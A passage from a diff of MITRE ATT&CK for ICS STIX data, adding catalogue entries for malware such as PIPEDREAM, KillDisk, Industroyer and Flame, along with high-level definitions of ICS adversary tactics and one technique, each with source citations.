"x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Jimmy Wylie, Dragos, Inc." 
+ ], + "x_mitre_aliases": [ + "INCONTROLLER", + "PIPEDREAM" + ], + "type": "malware", + "id": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b", + "created": "2022-09-28T20:07:40.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1045", + "external_id": "S1045" + }, + { + "source_name": "PIPEDREAM", + "description": "(Citation: Dragos-Pipedream)(Citation: Wylie-22)" + }, + { + "source_name": "CISA-AA22-103A", + "description": "DHS/CISA. (2022, May 25). Alert (AA22-103A) APT Cyber Tools Targeting ICS/SCADA Devices. Retrieved September 28, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-103a" + }, + { + "source_name": "Dragos-Pipedream", + "description": "DRAGOS. (2022, April 13). Pipedream: Chernovite’s Emerging Malware Targeting Industrial Control Systems. Retrieved September 28, 2022.", + "url": "https://hub.dragos.com/hubfs/116-Whitepapers/Dragos_ChernoviteWP_v2b.pdf?hsLang=en" + }, + { + "source_name": "Wylie-22", + "description": "Jimmy Wylie. (2022, August). Analyzing PIPEDREAM: Challenges in Testing an ICS Attack Toolkit. Defcon 30.", + "url": "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Jimmy%20Wylie%20-%20Analyzing%20PIPEDREAM%20Challenges%20in%20testing%20an%20ICS%20attack%20toolkit.pdf" + }, + { + "source_name": "Brubaker-Incontroller", + "description": "Nathan Brubaker, Keith Lunden, Ken Proska, Muhammad Umair, Daniel Kapellmann Zafra, Corey Hildebrandt, Rob Caldwell. (2022, April 13). INCONTROLLER: New State-Sponsored Cyber Attack Tools Target Multiple Industrial Control Systems. Retrieved September 28, 2022.", + "url": "https://www.mandiant.com/resources/incontroller-state-sponsored-ics-tool" + }, + { + "source_name": "Schneider-Incontroller", + "description": "Schneider Electric. (2022, April 14). 
Schneider Electric Security Bulletin: “APT Cyber Tools Targeting ICS/SCADA Devices” . Retrieved September 28, 2022.", + "url": "https://download.schneider-electric.com/files?p_Doc_Ref=SESB-2022-01" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-08T22:13:42.357Z", + "name": "KillDisk", + "description": "[KillDisk](https://attack.mitre.org/software/S0607) is a disk-wiping tool designed to overwrite files with random data to render the OS unbootable. It was first observed as a component of [BlackEnergy](https://attack.mitre.org/software/S0089) malware during cyber attacks against Ukraine in 2015. [KillDisk](https://attack.mitre.org/software/S0607) has since evolved into stand-alone malware used by a variety of threat actors against additional targets in Europe and Latin America; in 2016 a ransomware component was also incorporated into some [KillDisk](https://attack.mitre.org/software/S0607) variants.(Citation: KillDisk Ransomware)(Citation: ESEST Black Energy Jan 2016)(Citation: Trend Micro KillDisk 1)(Citation: Trend Micro KillDisk 2)", + "x_mitre_platforms": [ + "Linux", + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_aliases": [ + "KillDisk", + "Win32/KillDisk.NBI", + "Win32/KillDisk.NBH", + "Win32/KillDisk.NBD", + "Win32/KillDisk.NBC", + "Win32/KillDisk.NBB" + ], + "type": "malware", + "id": "malware--e221eb77-1502-4129-af1d-fe1ad55e7ec6", + "created": "2021-01-20T18:05:07.059Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0607", + "external_id": "S0607" + }, + { + 
"source_name": "KillDisk Ransomware", + "description": "Catalin Cimpanu. (2016, December 29). KillDisk Disk-Wiping Malware Adds Ransomware Component. Retrieved January 12, 2021.", + "url": "https://www.bleepingcomputer.com/news/security/killdisk-disk-wiping-malware-adds-ransomware-component/" + }, + { + "source_name": "ESEST Black Energy Jan 2016", + "description": "Cherepanov, A.. (2016, January 3). BlackEnergy by the SSHBearDoor: attacks against Ukrainian news media and electric industry. Retrieved May 18, 2016.", + "url": "http://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/" + }, + { + "source_name": "Trend Micro KillDisk 1", + "description": "Fernando Merces, Byron Gelera, Martin Co. (2018, June 7). KillDisk Variant Hits Latin American Finance Industry. Retrieved January 12, 2021.", + "url": "https://www.trendmicro.com/en_us/research/18/f/new-killdisk-variant-hits-latin-american-financial-organizations-again.html" + }, + { + "source_name": "Trend Micro KillDisk 2", + "description": "Gilbert Sison, Rheniel Ramos, Jay Yaneza, Alfredo Oliveira. (2018, January 15). KillDisk Variant Hits Latin American Financial Groups. 
Retrieved January 12, 2021.", + "url": "https://www.trendmicro.com/en_us/research/18/a/new-killdisk-variant-hits-financial-organizations-in-latin-america.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-20T20:37:50.556Z", + "name": "Industroyer", + "description": "[Industroyer](https://attack.mitre.org/software/S0604) is a sophisticated malware framework designed to cause an impact to the working processes of Industrial Control Systems (ICS), specifically components used in electrical substations.(Citation: ESET Industroyer) [Industroyer](https://attack.mitre.org/software/S0604) was used in the attacks on the Ukrainian power grid in December 2016.(Citation: Dragos Crashoverride 2017) This is the first publicly known malware specifically designed to target and impact operations in the electric grid.(Citation: Dragos Crashoverride 2018)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Dragos Threat Intelligence", + "Joe Slowik - Dragos" + ], + "x_mitre_aliases": [ + "Industroyer", + "CRASHOVERRIDE", + "Win32/Industroyer" + ], + "type": "malware", + "id": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "created": "2021-01-04T20:42:21.997Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0604", + "external_id": "S0604" + }, + { + "source_name": "CRASHOVERRIDE", + "description": "(Citation: Dragos Crashoverride 2017)" + }, + { + "source_name": "Win32/Industroyer", + "description": "(Citation: ESET Industroyer)" + }, + { + 
"source_name": "ESET Industroyer", + "description": "Anton Cherepanov. (2017, June 12). Win32/Industroyer: A new threat for industrial controls systems. Retrieved December 18, 2020.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + }, + { + "source_name": "Dragos Crashoverride 2017", + "description": "Dragos Inc.. (2017, June 13). CRASHOVERRIDE Analysis of the Threat to Electric Grid Operations. Retrieved December 18, 2020.", + "url": "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf" + }, + { + "source_name": "Dragos Crashoverride 2018", + "description": "Joe Slowik. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved December 18, 2020.", + "url": "https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-12T17:51:18.408Z", + "name": "Flame", + "description": "[Flame](https://attack.mitre.org/software/S0143) is a sophisticated toolkit that has been used to collect information since at least 2010, largely targeting Middle East countries. 
(Citation: Kaspersky Flame)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_aliases": [ + "Flame", + "Flamer", + "sKyWIper" + ], + "type": "malware", + "id": "malware--ff6840c9-4c87-4d07-bbb6-9f50aa33d498", + "created": "2017-05-31T21:33:21.973Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0143", + "external_id": "S0143" + }, + { + "source_name": "Flame", + "description": "(Citation: Kaspersky Flame)" + }, + { + "source_name": "sKyWIper", + "description": "(Citation: Kaspersky Flame) (Citation: Crysys Skywiper)" + }, + { + "source_name": "Flamer", + "description": "(Citation: Kaspersky Flame) (Citation: Symantec Beetlejuice)" + }, + { + "source_name": "Kaspersky Flame", + "description": "Gostev, A. (2012, May 28). The Flame: Questions and Answers. Retrieved March 1, 2017.", + "url": "https://securelist.com/the-flame-questions-and-answers-51/34344/" + }, + { + "source_name": "Crysys Skywiper", + "description": "sKyWIper Analysis Team. (2012, May 31). sKyWIper (a.k.a. Flame a.k.a. Flamer): A complex malware for targeted attacks. Retrieved September 6, 2018.", + "url": "https://www.crysys.hu/publications/files/skywiper.pdf" + }, + { + "source_name": "Symantec Beetlejuice", + "description": "Symantec Security Response. (2012, May 31). Flamer: A Recipe for Bluetoothache. 
Retrieved February 25, 2017.", + "url": "https://www.symantec.com/connect/blogs/flamer-recipe-bluetoothache" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-08T22:12:52.701Z", + "name": "Inhibit Response Function", + "description": "The adversary is trying to prevent your safety, protection, quality assurance, and operator intervention functions from responding to a failure, hazard, or unsafe state.\n\nInhibit Response Function consists of techniques that adversaries use to hinder the safeguards put in place for processes and products. This may involve the inhibition of safety, protection, quality assurance, or operator intervention functions to disrupt safeguards that aim to prevent the loss of life, destruction of equipment, and disruption of production. These techniques aim to actively deter and prevent expected alarms and responses that arise due to statuses in the ICS environment. Adversaries may modify or update system logic, or even outright prevent responses with a denial-of-service. They may result in the prevention, destruction, manipulation, or modification of programs, logic, devices, and communications. As prevention functions are generally dormant, reporting and processing functions can appear fine, but may have been altered to prevent failure responses in dangerous scenarios. Unlike [Evasion](https://attack.mitre.org/tactics/TA0103), Inhibit Response Function techniques may be more intrusive, such as actively preventing responses to a known dangerous scenario. 
Adversaries may use these techniques to follow through with or provide cover for [Impact](https://attack.mitre.org/tactics/TA0105) techniques.", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_shortname": "inhibit-response-function", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--298fe907-7931-4fd2-8131-2814dd493134", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0107", + "external_id": "TA0107" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-09-29T21:38:48.906Z", + "name": "Privilege Escalation", + "description": "The adversary is trying to gain higher-level permissions.\n\nPrivilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. Adversaries can often enter and explore a network with unprivileged access but require elevated permissions to follow through on their objectives. 
Common approaches are to take advantage of system weaknesses, misconfigurations, and vulnerabilities.", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_shortname": "privilege-escalation", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--33752ae7-f875-4f43-bdb6-d8d02d341046", + "created": "2021-04-10T17:32:33.899Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0111", + "external_id": "TA0111" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-08T22:09:46.867Z", + "name": "Lateral Movement", + "description": "The adversary is trying to move through your ICS environment.\n\nLateral Movement consists of techniques that adversaries use to enter and control remote systems on a network. These techniques abuse default credentials, known accounts, and vulnerable services, and may also leverage dual-homed devices and systems that reside on both the IT and OT networks. The adversary uses these techniques to pivot to their next point in the environment, positioning themselves to where they want to be or think they should be. Following through on their primary objective often requires [Discovery](https://attack.mitre.org/tactics/TA0102) of the network and [Collection](https://attack.mitre.org/tactics/TA0100) to develop awareness of unique ICS devices and processes, in order to find their target and subsequently gain access to it. Reaching this objective often involves pivoting through multiple systems, devices, and accounts. 
Adversaries may install their own remote tools to accomplish Lateral Movement or leverage default tools, programs, and manufacturer set or other legitimate credentials native to the network, which may be stealthier.", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_shortname": "lateral-movement", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--51c25a9e-8615-40c0-8afd-1da578847924", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0109", + "external_id": "TA0109" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Discovery", + "description": "The adversary is locating information to assess and identify their targets in your environment.\n\nDiscovery consists of techniques that adversaries use to survey your ICS environment and gain knowledge about the internal network, control system devices, and how their processes interact. These techniques help adversaries observe the environment and determine next steps for target selection and Lateral Movement. They also allow adversaries to explore what they can control and gain insight on interactions between various control system processes. Discovery techniques are often an act of progression into the environment which enable the adversary to orient themselves before deciding how to act. Adversaries may use Discovery techniques that result in Collection, to help determine how available resources benefit their current objective. 
A combination of native device communications and functions, and custom tools are often used toward this post-compromise information-gathering objective.", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_shortname": "discovery", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--696af733-728e-49d7-8261-75fdc590f453", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0102", + "external_id": "TA0102" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Initial Access", + "description": "The adversary is trying to get into your ICS environment.\n\nInitial Access consists of techniques that adversaries may use as entry vectors to gain an initial foothold within an ICS environment. These techniques include compromising operational technology assets, IT resources in the OT network, and external remote services and websites. They may also target third party entities and users with privileged access. In particular, these initial access footholds may include devices and communication mechanisms with access to and privileges in both the IT and OT environments. IT resources in the OT environment are also potentially vulnerable to the same attacks as enterprise IT systems. Trusted third parties of concern may include vendors, maintenance personnel, engineers, external integrators, and other outside entities involved in expected ICS operations. Vendor maintained assets may include physical devices, software, and operational equipment. 
Initial access techniques may also leverage outside devices, such as radios, controllers, or removable media, to remotely interfere with and possibly infect OT operations.", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_shortname": "initial-access", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--69da72d2-f550-41c5-ab9e-e8255707f28a", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0108", + "external_id": "TA0108" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-08T22:22:09.571Z", + "name": "Impact", + "description": "The adversary is trying to manipulate, interrupt, or destroy your ICS systems, data, and their surrounding environment.\n\nImpact consists of techniques that adversaries use to disrupt, compromise, destroy, and manipulate the integrity and availability of control system operations, processes, devices, and data. These techniques encompass the influence and effects resulting from adversarial efforts to attack the ICS environment or that tangentially impact it. Impact techniques can result in more instantaneous disruption to control processes and the operator, or may result in more long term damage or loss to the ICS environment and related operations. The adversary may leverage [Impair Process Control](https://attack.mitre.org/tactics/TA0106) techniques, which often manifest in more self-revealing impacts on operations, or [Impair Process Control](https://attack.mitre.org/tactics/TA0106) techniques to hinder safeguards and alarms in order to follow through with and provide cover for Impact. 
In some scenarios, control system processes can appear to function as expected, but may have been altered to benefit the adversary’s goal over the course of a longer duration. These techniques might be used by adversaries to follow through on their end goal or to provide cover for a confidentiality breach.\n\n[Loss of Productivity and Revenue](https://attack.mitre.org/techniques/T0828), [Theft of Operational Information](https://attack.mitre.org/techniques/T0882), and [Damage to Property](https://attack.mitre.org/techniques/T0879) are meant to encompass some of the more granular goals of adversaries in targeted and untargeted attacks. These techniques in and of themselves are not necessarily detectable, but the associated adversary behavior can potentially be mitigated and/or detected.", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_shortname": "impact", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--77542f83-70d0-40c2-8a9d-ad2eb8b00279", + "created": "2019-03-14T18:44:44.639Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0105", + "external_id": "TA0105" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Persistence", + "description": "The adversary is trying to maintain their foothold in your ICS environment.\n\nPersistence consists of techniques that adversaries use to maintain access to ICS systems and devices across restarts, changed credentials, and other interruptions that could cut off their access. 
Techniques used for persistence include any access, action, or configuration changes that allow them to secure their ongoing activity and keep their foothold on systems. This may include replacing or hijacking legitimate code, firmware, and other project files, or adding startup code and downloading programs onto devices.", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_shortname": "persistence", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--78f1d2ae-a579-44c4-8fc5-3e1775c73fac", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0110", + "external_id": "TA0110" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-08T22:19:16.160Z", + "name": "Execution", + "description": "The adversary is trying to run code or manipulate system functions, parameters, and data in an unauthorized way.\n\nExecution consists of techniques that result in adversary-controlled code running on a local or remote system, device, or other asset. This execution may also rely on unknowing end users or the manipulation of device operating modes to run. Adversaries may infect remote targets with programmed executables or malicious project files that operate according to specified behavior and may alter expected device behavior in subtle ways. Commands for execution may also be issued from command-line interfaces, APIs, GUIs, or other available interfaces. 
Techniques that run malicious code may also be paired with techniques from other tactics, particularly to aid network [Discovery](https://attack.mitre.org/tactics/TA0102) and [Collection](https://attack.mitre.org/tactics/TA0100), impact operations, and inhibit response functions.", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_shortname": "execution", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--93bf9a8e-b14c-4587-b6d5-9efc7c12eb45", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0104", + "external_id": "TA0104" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Command and Control", + "description": "The adversary is trying to communicate with and control compromised systems, controllers, and platforms with access to your ICS environment.\n\nCommand and Control consists of techniques that adversaries use to communicate with and send commands to compromised systems, devices, controllers, and platforms with specialized applications used in ICS environments. Examples of these specialized communication devices include human machine interfaces (HMIs), data historians, SCADA servers, and engineering workstations (EWS). Adversaries often seek to use commonly available resources and mimic expected network traffic to avoid detection and suspicion. For instance, commonly used ports and protocols in ICS environments, and even expected IT resources, depending on the target network. 
Command and Control may be established to varying degrees of stealth, often depending on the victim’s network structure and defenses.", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_shortname": "command-and-control", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--97c8ff73-bd14-4b6c-ac32-3d91d2c41e3f", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0101", + "external_id": "TA0101" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-08T22:18:50.880Z", + "name": "Collection", + "description": "The adversary is trying to gather data of interest and domain knowledge on your ICS environment to inform their goal.\n\nCollection consists of techniques adversaries use to gather domain knowledge and obtain contextual feedback in an ICS environment. This tactic is often performed as part of [Discovery](https://attack.mitre.org/tactics/TA0102), to compile data on control systems and targets of interest that may be used to follow through on the adversary’s objective. Examples of these techniques include observing operation states, capturing screenshots, identifying unique device roles, and gathering system and diagram schematics. Collection of this data can play a key role in planning, executing, and even revising an ICS-targeted attack. Methods of collection depend on the categories of data being targeted, which can include protocol specific, device specific, and process specific configurations and functionality. 
Information collected may pertain to a combination of system, supervisory, device, and network related data, which conceptually fall under high, medium, and low levels of plan operations. For example, information repositories on plant data at a high level or device specific programs at a low level. Sensitive floor plans, vendor device manuals, and other references may also be at risk and exposed on the internet or otherwise publicly accessible.", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_shortname": "collection", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--b2a67b1e-913c-46f6-b219-048a90560bb9", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0100", + "external_id": "TA0100" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Evasion", + "description": "The adversary is trying to avoid security defenses.\n\nEvasion consists of techniques that adversaries use to avoid technical defenses throughout their campaign. Techniques used for evasion include removal of indicators of compromise, spoofing communications, and exploiting software vulnerabilities. Adversaries may also leverage and abuse trusted devices and processes to hide their activity, possibly by masquerading as master devices or native software. 
Methods of defense evasion for this purpose are often more passive in nature.", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_shortname": "evasion", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--ddf70682-f3ce-479c-a9a4-7eadf9bfead7", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0103", + "external_id": "TA0103" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-08T22:15:17.020Z", + "name": "Impair Process Control", + "description": "The adversary is trying to manipulate, disable, or damage physical control processes.\n\nImpair Process Control consists of techniques that adversaries use to disrupt control logic and cause determinantal effects to processes being controlled in the target environment. Targets of interest may include active procedures or parameters that manipulate the physical environment. These techniques can also include prevention or manipulation of reporting elements and control logic. If an adversary has modified process functionality, then they may also obfuscate the results, which are often self-revealing in their impact on the outcome of a product or the environment. The direct physical control these techniques exert may also threaten the safety of operators and downstream users, which can prompt response mechanisms. 
Adversaries may follow up with or use [Inhibit Response Function](https://attack.mitre.org/tactics/TA0107) techniques in tandem, to assist with the successful abuse of control processes to result in [Impact](https://attack.mitre.org/tactics/TA0105).", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_shortname": "impair-process-control", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--ff048b6c-b872-4218-b68c-3735ebd1f024", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0106", + "external_id": "TA0106" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Block Command Message", + "description": "Adversaries may block a command message from reaching its intended target to prevent command execution. In OT networks, command messages are sent to provide instructions to control system devices. A blocked command message can inhibit response functions from correcting a disruption or unsafe condition. 
(Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011) (Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Device Configuration/Parameters" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_data_sources": [ + "Operational Databases: Process History/Live Data", + "Network Traffic: Network Traffic Flow", + "Application Log: Application Log Content", + "Operational Databases: Process/Event Alarm", + "Process: Process Termination" + ], + "type": "attack-pattern", + "id": "attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0803", + "external_id": "T0803" + }, + { + "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011", + "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ", + "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258" + }, + { + "source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016", + "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 
